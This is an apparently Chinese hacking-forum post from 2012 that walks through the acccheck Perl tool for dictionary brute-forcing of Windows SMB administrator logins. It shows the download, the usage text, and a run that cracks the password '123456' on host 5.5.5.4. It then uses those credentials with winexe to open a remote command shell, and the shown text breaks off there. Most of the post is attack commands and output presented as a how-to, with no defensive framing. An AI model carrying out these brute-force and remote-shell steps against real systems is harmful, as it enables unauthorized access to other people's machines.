切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
203 暴力破解 — acccheck[复制链接]
发表于 2012-10-4 22:08:09 | 显示全部楼层 |!read_mode!
下载:
  1. root@Dis9Team:~# wget http://labs.portcullis.co.uk/download/acccheck-0-2-1.tar.gz
  2. --2012-07-26 04:09:36--  http://labs.portcullis.co.uk/download/acccheck-0-2-1.tar.gz
  3. Resolving labs.portcullis.co.uk... 77.75.105.66
  4. Connecting to labs.portcullis.co.uk|77.75.105.66|:80... connected.
  5. HTTP request sent, awaiting response... 200 OK
  6. Length: 10008 (9.8K) [application/x-gzip]
  7. Saving to: `acccheck-0-2-1.tar.gz'

  8. 100%[======================================>] 10,008      3.78K/s   in 2.6s   

  9. 2012-07-26 04:09:43 (3.78 KB/s) - `acccheck-0-2-1.tar.gz' saved [10008/10008]

  10. root@Dis9Team:~# mv acccheck-0-2-1.tar.gz /pen/passswd/
  11. root@Dis9Team:~# cd /pen/passswd/
  12. root@Dis9Team:/pen/passswd# tar xf acccheck-0-2-1.tar.gz
复制代码

看文件
  1. root@Dis9Team:/pen/passswd# cd acccheck-0-2-1
  2. root@Dis9Team:/pen/passswd/acccheck-0-2-1# ls
  3. acccheck.pl  COPYING.ACCCHECK  COPYING.GPL  README.TXT
  4. root@Dis9Team:/pen/passswd/acccheck-0-2-1#
复制代码

acccheck.pl是可执行文件 pl后缀,说明可能是perl语言,查看一下
  1. root@Dis9Team:/pen/passswd/acccheck-0-2-1# file acccheck.pl
  2. acccheck.pl: a /usr/bin/perl -w script text executable
  3. root@Dis9Team:/pen/passswd/acccheck-0-2-1#
复制代码

运行他
  1. root@Dis9Team:/pen/passswd/acccheck-0-2-1# perl acccheck.pl

  2. acccheck.pl v0.2.1 - By Faiz

  3. Description:
  4. Attempts to connect to the IPC$ and ADMIN$ shares depending on which flags have been
  5. chosen, and tries a combination of usernames and passwords in the hope to identify
  6. the password to a given account via a dictionary password guessing attack.

  7. Usage = ./acccheck.pl [optional]

  8. -t [single host IP address]
  9. OR
  10. -T [file containing target ip address(es)]

  11. Optional:
  12. -p [single password]
  13. -P [file containing passwords]
  14. -u [single user]
  15. -U [file containing usernames]
  16. -v [verbose mode]

  17. Examples
  18. Attempt the 'Administrator' account with a [BLANK] password.
  19.         acccheck.pl -t 10.10.10.1
  20. Attempt all passwords in 'password.txt' against the 'Administrator' account.
  21.         acccheck.pl -t 10.10.10.1 -P password.txt
  22. Attempt all password in 'password.txt' against all users in 'users.txt'.
  23.         acccehck.pl -t 10.10.10.1 -U users.txt -P password.txt
  24. Attempt a single password against a single user.
  25.         acccheck.pl -t 10.10.10.1 -u administrator -p password
  26. root@Dis9Team:/pen/passswd/acccheck-0-2-1#
复制代码

他给了例子
Attempt the ‘Administrator’ account with a [BLANK] password.
        acccheck.pl -t 10.10.10.1
Attempt all passwords in ‘password.txt’ against the ‘Administrator’ account.
        acccheck.pl -t 10.10.10.1 -P password.txt
Attempt all password in ‘password.txt’ against all users in ‘users.txt’.
        acccehck.pl -t 10.10.10.1 -U users.txt -P password.txt
Attempt a single password against a single user.
        acccheck.pl -t 10.10.10.1 -u administrator -p password
测试一次
  1. root@Dis9Team:/pen/passswd/acccheck-0-2-1# perl acccheck.pl -t 5.5.5.4 -u administrator -P /tmp/pass

  2.         SUCCESS.... connected to 5.5.5.4 with username:'administrator' and password:'123456'

  3. End of Scan

  4. root@Dis9Team:/pen/passswd/acccheck-0-2-1#
复制代码
SUCCESS…. connected to 5.5.5.4 with username:’administrator’ and password:’123456′
成功了 链接
[code]root@Dis9Team:/pen/passswd/acccheck-0-2-1# winexe -U administrator%123456 //5.5.5.4 "cmd"
Microsoft Windows XP [
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-28 10:45

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部